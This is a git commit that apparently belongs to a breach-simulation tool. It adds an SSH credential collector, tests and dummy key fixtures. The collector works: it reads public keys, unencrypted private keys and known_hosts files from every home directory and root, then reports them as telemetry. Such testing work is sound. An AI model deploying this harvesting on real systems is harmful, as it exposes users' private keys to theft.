Agent, UT: Refactor SSH info collector to credential collector

This commit is contained in:
Ilija Lazoroski 2022-02-14 23:09:51 +01:00
parent 976c46cf86
commit 5aa5e33356
8 changed files with 245 additions and 0 deletions

View File

@ -0,0 +1,141 @@
import glob
import logging
import os
import pwd
from typing import Dict, Iterable
from common.utils.attack_utils import ScanStatus
from infection_monkey.credential_collectors import (
Credentials,
ICredentialCollector,
SSHKeypair,
Username,
)
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
logger = logging.getLogger(__name__)
class SSHCollector(ICredentialCollector):
"""
SSH keys and known hosts collection module
"""
default_dirs = ["/.ssh/", "/"]
def collect_credentials(self) -> Credentials:
logger.info("Started scanning for SSH credentials")
home_dirs = SSHCollector._get_home_dirs()
ssh_info = SSHCollector._get_ssh_files(home_dirs)
logger.info("Scanned for SSH credentials")
return SSHCollector._to_credentials(ssh_info)
@staticmethod
def _to_credentials(ssh_info: Iterable[Dict]) -> Credentials:
credentials_obj = Credentials(identities=[], secrets=[])
for info in ssh_info:
credentials_obj.identities.append(Username(info["name"]))
ssh_keypair = {}
if "public_key" in info:
ssh_keypair["public_key"] = info["public_key"]
if "private_key" in info:
ssh_keypair["private_key"] = info["private_key"]
if "public_key" in info:
ssh_keypair["known_hosts"] = info["known_hosts"]
credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
return credentials_obj
@staticmethod
def _get_home_dirs() -> Iterable[Dict]:
root_dir = SSHCollector._get_ssh_struct("root", "")
home_dirs = [
SSHCollector._get_ssh_struct(x.pw_name, x.pw_dir)
for x in pwd.getpwall()
if x.pw_dir.startswith("/home")
]
home_dirs.append(root_dir)
return home_dirs
@staticmethod
def _get_ssh_struct(name: str, home_dir: str) -> Dict:
"""
Construct the SSH info. It consisted of: name, home_dir,
public_key, private_key and known_hosts.
public_key: contents of *.pub file (public key)
private_key: contents of * file (private key)
known_hosts: contents of known_hosts file(all the servers keys are good for,
possibly hashed)
:param name: username of user, for whom the keys belong
:param home_dir: users home directory
:return: SSH info struct
"""
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
}
@staticmethod
def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
for info in usr_info:
path = info["home_dir"]
for directory in SSHCollector.default_dirs:
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, "*.pub")):
# Getting first file in current path with .pub extension(public key)
public = glob.glob(os.path.join(current_path, "*.pub"))[0]
logger.info("Found public key in %s" % public)
try:
with open(public) as f:
info["public_key"] = f.read()
# By default private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
# no use from ssh key if it's encrypted
private_key = f.read()
if private_key.find("ENCRYPTED") == -1:
info["private_key"] = private_key
logger.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
).send()
else:
continue
except (IOError, OSError):
pass
# By default, known hosts file is called 'known_hosts'
known_hosts = os.path.join(current_path, "known_hosts")
if os.path.exists(known_hosts):
try:
with open(known_hosts) as f:
info["known_hosts"] = f.read()
logger.info("Found known_hosts in %s" % known_hosts)
except (IOError, OSError):
pass
# If private key found don't search more
if info["private_key"]:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [
info
for info in usr_info
if info["private_key"] or info["known_hosts"] or info["public_key"]
]
return usr_info

View File

@ -0,0 +1 @@
from .SSH_credentials_collector import SSHCollector

View File

@ -0,0 +1,3 @@
-----BEGIN OPENSSH PRIVATE KEY-----
LoremIpsumSomethingNothing
-----END OPENSSH PRIVATE KEY-----

View File

@ -0,0 +1 @@
ssh-ed25519 something-public-here valid.email@at-email.com

View File

@ -0,0 +1,4 @@
|1|really+known+host|known_host1
|1|really+known+host|known_host2
|1|really+known+host|known_host3
|1|really+known+host|known_host4

View File

@ -0,0 +1 @@
ssh-ed25519 something-public-here valid.email@at-email.com

View File

@ -0,0 +1,94 @@
import os
import pwd
from pathlib import Path
import pytest
from infection_monkey.credential_collectors import SSHKeypair, Username
from infection_monkey.credential_collectors.ssh_collector import SSHCollector
@pytest.fixture
def project_name(pytestconfig):
home_dir = str(Path.home())
return "/" / Path(str(pytestconfig.rootdir).replace(home_dir, ""))
@pytest.fixture
def ssh_test_dir(project_name):
return project_name / "monkey" / "tests" / "data_for_tests" / "ssh_info"
@pytest.fixture
def get_username():
return pwd.getpwuid(os.getuid()).pw_name
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_credentials_collector_success(ssh_test_dir, get_username, monkeypatch):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_full")],
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 1
assert type(ssh_credentials.identities[0]) == Username
assert "username" in ssh_credentials.identities[0].content
assert ssh_credentials.identities[0].content["username"] == get_username
assert len(ssh_credentials.secrets) == 1
assert type(ssh_credentials.secrets[0]) == SSHKeypair
assert len(ssh_credentials.secrets[0].content) == 3
assert (
ssh_credentials.secrets[0]
.content["private_key"]
.startswith("-----BEGIN OPENSSH PRIVATE KEY-----")
)
assert (
ssh_credentials.secrets[0]
.content["public_key"]
.startswith("ssh-ed25519 something-public-here")
)
assert ssh_credentials.secrets[0].content["known_hosts"].startswith("|1|really+known+host")
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_no_ssh_credentials(monkeypatch):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs", []
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 0
assert len(ssh_credentials.secrets) == 0
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_collector_partial_credentials(monkeypatch, ssh_test_dir):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_partial")],
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.secrets[0].content) == 3
assert ssh_credentials.secrets[0].content["private_key"] is None
assert ssh_credentials.secrets[0].content["known_hosts"] is None
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
def test_ssh_collector_no_public_key(monkeypatch, ssh_test_dir):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
[str(ssh_test_dir / "ssh_info_no_public_key")],
)
ssh_credentials = SSHCollector().collect_credentials()
assert len(ssh_credentials.identities) == 0
assert len(ssh_credentials.secrets) == 0